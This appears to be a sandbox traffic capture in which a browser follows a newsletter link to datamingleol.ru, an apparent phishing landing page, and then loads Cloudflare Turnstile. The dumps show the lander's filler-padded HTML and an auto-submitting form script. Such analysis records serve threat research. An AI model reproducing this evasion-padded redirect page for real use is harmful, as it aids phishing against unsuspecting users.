                                      2024-09-13 13:15:51 UTC515INHTTP/1.1 200 OK
                                      ApiVersion: Distribute 1.1
                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                      Content-Type: application/octet-stream
                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                      Server: ECAcc (lpl/EF06)
                                      X-CID: 11
                                      X-Ms-ApiVersion: Distribute 1.2
                                      X-Ms-Region: prod-weu-z1
                                      Cache-Control: public, max-age=185422
                                      Date: Fri, 13 Sep 2024 13:15:51 GMT
                                      Content-Length: 55
                                      Connection: close
                                      X-CID: 2
                                      2024-09-13 13:15:51 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449746188.114.96.34434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:52 UTC777OUTGET /tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review HTTP/1.1
                                      Host: datamingleol.ru
                                      Connection: keep-alive
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: document
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Referer: https://link.sbstck.com/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:53 UTC823INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:53 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.3.33
                                      access-control-allow-origin: *
                                      set-cookie: PHPSESSID=k0qm5f5og2nqg3439jrhip006m; path=/
                                      expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      cache-control: no-store, no-cache, must-revalidate
                                      pragma: no-cache
                                      vary: Accept-Encoding
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ub7Udb%2F7G4xmCIvOj0D7b58CNDrkrM%2FsEWKDOuif1OvjdTq3hLnmEW3YNz5JCTzH8LYZwK0lARcz1hfjviAHElMzY1qM09J3G3bwPBaKa4jy6wD%2BGad7HnJsGzFeb5N2mss%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c28689749367d1e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:53 UTC546INData Raw: 38 35 36 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 64 61 73 68 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 54 68 65 20 62 65 73 74 20 63 61 72 20 73 61 66 65 74 79 20 64 65 76 69 63 65 20 69 73 20 61 20 72 65 61 72 2d 76 69 65 77 20 6d 69 72 72 6f 72 20 77 69 74 68 20 61 20 63 6f 70 20 69 6e 20 69 74 3a 20 56 69 67 69 6c 61 6e 63 65 20 69 73 20 6b 65 79 20 74 6f 20 73 61 66 65 74 79 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 6d 65 74 61 20 6e
                                      Data Ascii: 856<html lang="en"><head><title>dashingly</title>... <span>The best car safety device is a rear-view mirror with a cop in it: Vigilance is key to safety.</span> --><meta charset="UTF-8"><meta name="robots" content="noindex, nofollow"><meta n
                                      2024-09-13 13:15:53 UTC1369INData Raw: 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 65 6e 74 65 72 65 64 2d 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 7d 2e 66 73 2d 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6d 74 2d 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 72 65 6d 7d 2e 6d 74 2d 35 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 72 65 6d 7d 2e 74 65 78 74 2d 6d 75 74 65 64 7b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 21 2d 2d 20 3c 70 3e 46 72 75 69 74 73 20 63 6f 6e 74 61 69 6e 20 63 6f 6d 70 6f 75 6e 64 73
                                      Data Ascii: ;display:flex;justify-content:center}.centered-content{text-align:center;max-width:500px}.fs-5{font-size:1.25rem;display:block}.mt-2{margin-top:.5rem}.mt-5{margin-top:3rem}.text-muted{color:#6c757d}</style></head><body>... <p>Fruits contain compounds
                                      2024-09-13 13:15:53 UTC226INData Raw: 61 6c 6c 20 68 65 61 6c 74 68 20 61 6e 64 20 6c 6f 6e 67 65 76 69 74 79 3a 20 49 74 20 65 6e 68 61 6e 63 65 73 20 71 75 61 6c 69 74 79 20 6f 66 20 6c 69 66 65 2e 20 2d 2d 3e 0a 09 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6f 62 73 65 71 75 69 6f 75 73 6c 79 28 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 2e 73 75 62 6d 69 74 28 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 3c 70 3e 53 65 6c 66 2d 64 72 69 76 69 6e 67 20 63 61 72 73 20 61 72 65 20 74 68 65 20 6e 61 74 75 72 61 6c 20 65 78 74 65 6e 73 69 6f 6e 20 6f 66 20 61 63 74 69 76 65 20 73 61 66 65 74 79 3c 2f 70 3e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: all health and longevity: It enhances quality of life. --><script>function obsequiously() {document.forms[0].submit();}</script>... <p>Self-driving cars are the natural extension of active safety</p> --></body></html>
                                      2024-09-13 13:15:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449747104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:54 UTC543OUTGET /turnstile/v0/api.js HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://datamingleol.ru/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:54 UTC386INHTTP/1.1 302 Found
                                      Date: Fri, 13 Sep 2024 13:15:54 GMT
                                      Content-Length: 0
                                      Connection: close
                                      access-control-allow-origin: *
                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                      cross-origin-resource-policy: cross-origin
                                      location: /turnstile/v0/b/388c99dd0998/api.js
                                      Server: cloudflare
                                      CF-RAY: 8c2868a00e6b0cc0-EWR
                                      alt-svc: h3=":443"; ma=86400


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449748104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:54 UTC558OUTGET /turnstile/v0/b/388c99dd0998/api.js HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://datamingleol.ru/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:54 UTC471INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:54 GMT
                                      Content-Type: application/javascript; charset=UTF-8
                                      Content-Length: 47262
                                      Connection: close
                                      accept-ranges: bytes
                                      last-modified: Wed, 11 Sep 2024 15:58:53 GMT
                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                      access-control-allow-origin: *
                                      cross-origin-resource-policy: cross-origin
                                      Server: cloudflare
                                      CF-RAY: 8c2868a3f94642dd-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:54 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                      Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                      2024-09-13 13:15:54 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 72 29 7b 76 61 72 20 61 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 61 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 66 3b 74 72 79 7b 66 6f 72 28 61 3d 61 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                      Data Ascii: t(e){if(Array.isArray(e))return e}function Bt(e,r){var a=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(a!=null){var o=[],c=!0,l=!1,g,f;try{for(a=a.call(e);!(c=(g=a.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                      2024-09-13 13:15:54 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 73 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 73 5b 30 5d 26 26 28 61 3d 30 29 29 2c 61 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 73 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 73 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 73 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 73 3d 5b 73 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                      Data Ascii: ])}}function p(s){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,s[0]&&(a=0)),a;)try{if(o=1,c&&(l=s[0]&2?c.return:s[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,s[1])).done)return l;switch(c=0,l&&(s=[s[0]&2,l.val
                                      2024-09-13 13:15:54 UTC1369INData Raw: 29 29 3b 76 61 72 20 56 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 56 65 7c 7c 28 56 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 3d 22 66 61 69 6c 75 72 65 2d 66 65 65 64 62 61 63 6b 22 2c 65 2e 46 41 49
                                      Data Ascii: ));var Ve;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Ve||(Ve={}));var Se;(function(e){e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVING_TROUBLES="failure-having-troubles",e.FAILURE_FEEDBACK="failure-feedback",e.FAI
                                      2024-09-13 13:15:54 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 41 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c 31 30 30 7d 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 58 74 28 65 29 7b 72 65 74 75 72 6e
                                      Data Ascii: unction L(e,r){return e.indexOf(r)!==-1}function nt(e){return L(["auto","dark","light"],e)}function it(e){return L(["auto","never"],e)}function ot(e){return e>0&&e<9e5}function ct(e){return e>0&&e<36e4}var Ar=/^[0-9A-Za-z_-]{3,100}$/;function Xt(e){return
                                      2024-09-13 13:15:54 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 79 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 65 72 3d 38 65 33 2c 62 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 74 72 3d 33 2c 72 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 30 2f 30 22 3b 76 61 72 20 43 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 4e 72 3d 5b 22 61 72 2d 65 67 22 2c 22 65 73 2d 65 73 22 2c 22 63 73 2d 63 7a
                                      Data Ascii: allenge_response",yt="cf-turnstile-response",_t="g-recaptcha-response",er=8e3,bt="private-token",tr=3,rr=500,ar=500,Y="0/0";var Cr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],Nr=["ar-eg","es-es","cs-cz
                                      2024-09-13 13:15:54 UTC1369INData Raw: 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 61 26 26 72 3f 22 35 34 30 70 78 22 3a 61 26 26 6f 3f 22 35 30 30 70 78 22 3a 61 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 72 28 65 2c 72 29 7b 69 66 28 21 55 28 65 2c
                                      Data Ascii: rFeedback,o=e.isModeratelyVerbose;return a&&r?"540px":a&&o?"500px":a?"480px":r?"650px":o?"590px":"570px"};function He(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function nr(e,r){if(!U(e,
                                      2024-09-13 13:15:54 UTC1369INData Raw: 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 6f 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 49 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 7d 72 65 74 75 72 6e 20
                                      Data Ascii: f(o===null||!or(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Ie(o,arguments,ce(this).constructor)}return
                                      2024-09-13 13:15:54 UTC1369INData Raw: 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 72 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 61 3d 65 2e 73 72 63 2c 6f 3d 61 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 72 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 57 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 70
                                      Data Ascii: ript tag, some features may not be available",43777);var r={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(r.loadedAsync=!0);var a=e.src,o=a.split("?");return o.length>1&&(r.params=new URLSearchParams(o[1])),r}function W(){return typeof p
                                      2024-09-13 13:15:54 UTC1369INData Raw: 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 78 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 78 2e 69 64 3d 65 2b 22 2d 66 72 22 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 67 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64
                                      Data Ascii: ius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden",s.style.margin="0px auto";var x=document.createElement("iframe");x.id=e+"-fr",x.setAttribute("src",g),x.setAttribute("allow","cross-origin-isolated; fullscreen"),x.setAttribute("sand


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.449750104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:55 UTC383OUTGET /turnstile/v0/b/388c99dd0998/api.js HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:55 UTC471INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:55 GMT
                                      Content-Type: application/javascript; charset=UTF-8
                                      Content-Length: 47262
                                      Connection: close
                                      accept-ranges: bytes
                                      last-modified: Wed, 11 Sep 2024 15:58:53 GMT
                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                      access-control-allow-origin: *
                                      cross-origin-resource-policy: cross-origin
                                      Server: cloudflare
                                      CF-RAY: 8c2868a8da641895-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:55 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                      Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
